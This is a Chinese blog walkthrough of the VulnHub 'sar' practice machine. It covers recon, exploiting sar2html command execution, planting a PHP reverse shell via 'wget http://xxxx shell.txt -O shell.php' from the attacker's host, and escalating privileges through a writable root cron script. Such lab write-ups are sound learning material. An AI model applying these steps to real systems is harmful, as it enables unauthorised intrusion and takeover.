sar靶场 渗透思路

于 2024-07-02 14:40:37 发布
阅读量262 收藏 5
点赞数 4
文章标签: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_52732967/article/details/140125414
版权

打点

资产收集
在这里插入图片描述
就一个端口开放
在这里插入图片描述
目录爆破出一个路径
在这里插入图片描述
观察他感觉是路径
在这里插入图片描述
感觉像是cms,找找页面上有什么关键字(名词)
依次试了sar2ascii、sar2html,发现是sar2html

类似这种cms的渗透思路,肯定是搜索该应用的漏洞
在这里插入图片描述
在这里插入图片描述
得知利用方法
试试管不管用
在这里插入图片描述
有用!

显然是bash指令有用,那么我们尝试写一个反弹shell
但是这个位置给shell没用
(了解了一下得知:好像是在url部分给这种带&的容易出问题,有了解的小伙伴们可以分享一下原因,让我也学习学习)

所以我们绕一步,咱让他下载我们写的脚本文件(写个反弹shell)
在这里插入图片描述

结果我们发现不好使
肯定是它后端搞了什么过滤的东西

咋不这么写,因为能用bash语法了,咱直接来个转换文件类型
wget http://xxxx shell.txt -O shell.php
-O的妙用
在这里插入图片描述
因为是sar2HTML路劲下的资源进而开始的操作
所以我们的php在该统计路径下

直接访问 ip/shell.php同时开启监听

内网

在这里插入图片描述
有自启动任务
看看
在这里插入图片描述
发现权限很低,我心凉了一般

看看里面写的什么
在这里插入图片描述
再看看调用的那个write
在这里插入图片描述
可以更改,咱们直接写上我们的反弹shell在write中开启监听,至此成功

渗透思路:以后做web的渗透时,首先要判断是不是cms写的,判断方法是,依据网页中的一些页眉页脚,提示灯信息中的关键名词是搜索,进而确定是否是cms
之后就搜索该cms存在的漏洞

Zack_th
关注
  • 4
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
SAR成像概述
lightninghenry的博客
06-27 3081
1. 发展概述 雷达是英文Radar(Radio detection and ranging)的音译,原意为“无线电探测与测距”。雷达的发明是无线电发展史上的里程碑,二战时,英国急需通过雷达探测空中金属物体来帮助搜寻德国飞机,这期间,雷达技术飞速发展,发展出了地对空、空对地轰炸、空对空火控、敌我识别等功能。雷达在第二次世界大战中发挥了重大作用,至今仍是军用和许多民用领域的重要传感器。 早期雷达系统通过时间延迟来测距,通过天线指向来测角,通过多普勒频移测速。1951年,Carl Wiley发现,通..
靶机练习之sar
qq_52360932的博客
04-01 4601
靶机练习之sar,学习笔记
vulnhub sar 靶场练习
鸥鹭忘机
09-07 2086
前言 这次练习的靶机是vulnhub平台下的sar,该靶机是一个类似oscp的虚拟机,目的是提高并巩固渗透测试的知识点。下载地址为https://www.vulnhub.com/entry/sar-1,425/。这个靶机中没有出现新的知识点,难度相对比较简单。如果看过我前面vulnhub DC系列的文章,那么这次靶机可以独立自主完成。 虚拟机配置 这次采用的网络连接模式依然是NAT模式,为了避免扫描到其他物理主机。在导入虚拟机后,右击sar靶机,然后选中配置。依次点击网络配置->NAT模式->高
靶机渗透sar
weixin_64267091的博客
02-28 1083
靶机渗透过程也就分为那几步骤,首先就是信息收集,找ip,端口,目录,漏洞。然后就进行漏洞分析,在进行漏洞分析的时候使用到了kali中自带的工具searchsploit,使用它搜索sar2HTML存在的漏洞,然后将漏洞利用脚本拷贝到本地,最后得知漏洞利用方式。最后就利用远程代码执行漏洞,上传反弹shell脚本,上传脚本一直出问题,也不知道为啥,最后上传了个shell.py,反弹成功。然后就是最后提权部分,利用了计划任务提权,获取root权限的关键是finally.sh脚本以root用户的权限来执行。
[VulnHub靶机渗透] Sar: 1
人若无名,便可专心练剑
02-07 963
靶机精讲 之 SAR ,vulnhub靶机,盲打这台机器吧,老手测试一下宝刀,新手验证一下成长!标准的攻击链,却也需要你的腾挪躲闪。sar2html利用获得立足点,自动任务提权,很简单,但也未必打得很顺利,实战就是这样,大处的利用你要会,小的知识点、技能点也不能含糊。小试牛刀一下,you can do it!
vulnhub:Sar
cjstang的博客
06-16 765
OSCP-2:这次练习的靶机是vulnhub平台下的sar,该靶机是一个类似oscp的虚拟机,目的是提高并巩固渗透测试的知识点。 主要利用方式:sar2HTML命令执行反弹shell(可php文件上传反弹shell)+定时脚本提权......
国产PIE-SAR软件
IvanLJF的专栏
04-13 2574
PIE-SAR是一款针对国内外主流星载SAR传感器的数据处理分析软件,提供图形化操作界面。目前已支持国内外主流星载SAR传感器的数据处理与分析,包括强度图像基础处理、区域网平差处理、InSAR地形测绘、时序InSAR形变监测和极化SAR分割分类处理等模块。目前软件涵盖的功能模块相对比较全,主要对标国外的ENVI SARSacpe,PCI GXL、GAMMA等。
SAR图像超分辨技术
FPGA/MATLAB学习教程/源码/项目合作开发
10-10 8938
合成孔径雷达起源于20世纪50年代,是一种具有高分辨力的成像雷达。其原理是通过飞行载体运动来形成雷达的虚拟天线,从而获得高方位分辨率的雷达图像数据。 合成孔径雷达具有其它雷达所无法比拟的优势。它具有全天候的工作能力,不受天气条件和光照条件的影响,能够昼夜工作并且穿透云层、烟雾等各种障碍,能够经受住各种恶劣天气的考验。合成孔径雷达还具有防区外探测的能力,可以不直接飞跃某一地区而对该地区进行探测,因此比一般的红外和光电传感器具有更远的探测能力。也正是这些优势和特点使得合成孔径雷达的发展和应用更为迅速和广泛。
PIE-SAR用户手册
10-08
PIE-SAR用户手册 PIE-SAR用户手册是航天宏图信息技术股份有限公司开发的一款雷达影像数据处理软件的用户手册。本手册为用户提供了详细的软件使用指南,包括软件简介、技术支持、界面说明、系统安装、使用教程等多...
利用SARScape裁剪SAR图像
04-17
在遥感领域,合成孔径雷达(Synthetic Aperture Radar,简称SAR)图像是一种不受光照、云雾等天气条件影响的成像技术,广泛应用于地形测绘、灾害监测、海洋观测等多个方面。为了对SAR图像进行分析或特定区域的研究,...
SAR_SAR_雷达_
09-30
合成孔径雷达(Synthetic Aperture Radar,简称SAR)是一种利用雷达波进行远程成像的技术,它在军事、地理测绘、环境监测等多个领域有着广泛的应用。本篇将深入探讨SAR的工作原理、成像过程以及相关的仿真技术。 ...
实战精通性能工具sar
09-16
"实战精通性能工具sar" sar(System Activity Reporter 系统活动情况报告)是 Linux 上最为全面的系统性能分析工具之一,能够从多方面对系统的活动进行报告,包括文件的读写情况、系统调用的使用情况、磁盘 I/O、...
SAR回波仿真_SAR回波仿真_源码
10-04
**SAR回波仿真**是遥感领域中的一个重要技术,主要应用于合成孔径雷达(Synthetic Aperture Radar,简称SAR)系统的研究与设计。SAR是一种主动式的雷达遥感技术,通过发射雷达波并接收地表反射的回波信号,来获取...
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8340
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
基于豪猪优化算法CPO-VMD实现信号去噪目标函数为包络信息熵 包络熵 排列熵 样本熵最小附matlab代码.rar
最新发布
07-19
1.版本:matlab2014/2019a/2021a 2.附赠案例数据可直接运行matlab程序。 3.代码特点:参数化编程、参数可方便更改、代码编程思路清晰、注释明细。 4.适用对象:计算机,电子信息工程、数学等专业的大学生课程设计、期末大作业和毕业设计。 5.作者介绍:某大厂资深算法工程师,从事Matlab算法仿真工作10年;擅长智能优化算法、神经网络预测、信号处理、元胞自动机等多种领域的算法仿真实验,更多仿真源码、数据集定制私信+。 替换数据可以直接使用,注释清楚,适合新手
高分项目-基于SpringBoot框架实现的毕业生信息招聘平台(包含全套源码 + 数据库sql + 论文).zip
07-19
【项目资源】:包含前端、后端、移动开发、操作系统、人工智能、物联网、信息化管理、数据库、硬件开发、大数据、课程资源、音视频、网站开发等各种技术项目的源码。包括STM32、ESP8266、PHP、QT、Linux、iOS、C++、Java、python、web、C#、EDA、proteus、RTOS等项目的源码。【项目质量】:所有源码都经过严格测试,可以直接运行。功能在确认正常工作后才上传。【适用人群】:适用于希望学习不同技术领域的小白或进阶学习者。可作为毕设项目、课程设计、大作业、工程实训或初期项目立项。【附加价值】:项目具有较高的学习借鉴价值,也可直接拿来修改复刻。对于有一定基础或热衷于研究的人来说,可以在这些基础代码上进行修改和扩展,实现其他功能。【沟通交流】:有任何使用上的问题,欢迎随时与博主沟通,博主会及时解答。鼓励下载和使用,并欢迎大家互相学习,共同进步。
Matlab实现鱼鹰优化算法OOA-CNN-LSTM-Multihead-Attention温度预测附matlab代码.rar
07-19
1.版本:matlab2014/2019a/2021a 2.附赠案例数据可直接运行matlab程序。 3.代码特点:参数化编程、参数可方便更改、代码编程思路清晰、注释明细。 4.适用对象:计算机,电子信息工程、数学等专业的大学生课程设计、期末大作业和毕业设计。 5.作者介绍:某大厂资深算法工程师,从事Matlab算法仿真工作10年;擅长智能优化算法、神经网络预测、信号处理、元胞自动机等多种领域的算法仿真实验,更多仿真源码、数据集定制私信+。 替换数据可以直接使用,注释清楚,适合新手
高分项目-基于SpringBoot框架实现的餐厅点餐系统(包含全套源码 + 数据库sql + 论文).zip
07-19
【项目资源】:包含前端、后端、移动开发、操作系统、人工智能、物联网、信息化管理、数据库、硬件开发、大数据、课程资源、音视频、网站开发等各种技术项目的源码。包括STM32、ESP8266、PHP、QT、Linux、iOS、C++、Java、python、web、C#、EDA、proteus、RTOS等项目的源码。【项目质量】:所有源码都经过严格测试,可以直接运行。功能在确认正常工作后才上传。【适用人群】:适用于希望学习不同技术领域的小白或进阶学习者。可作为毕设项目、课程设计、大作业、工程实训或初期项目立项。【附加价值】:项目具有较高的学习借鉴价值,也可直接拿来修改复刻。对于有一定基础或热衷于研究的人来说,可以在这些基础代码上进行修改和扩展,实现其他功能。【沟通交流】:有任何使用上的问题,欢迎随时与博主沟通,博主会及时解答。鼓励下载和使用,并欢迎大家互相学习,共同进步。
SAR成像原理与图像特性解析
"这份PDF资料是DLR 2015 Part3,主要探讨了合成孔径雷达(SAR)的成像原理和图像特性,适用于初步学习SAR成像算法的人群。由德国航空航天中心(DLR)的Microwaves and Radar Institute提供,作者Marwan Younis。" ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值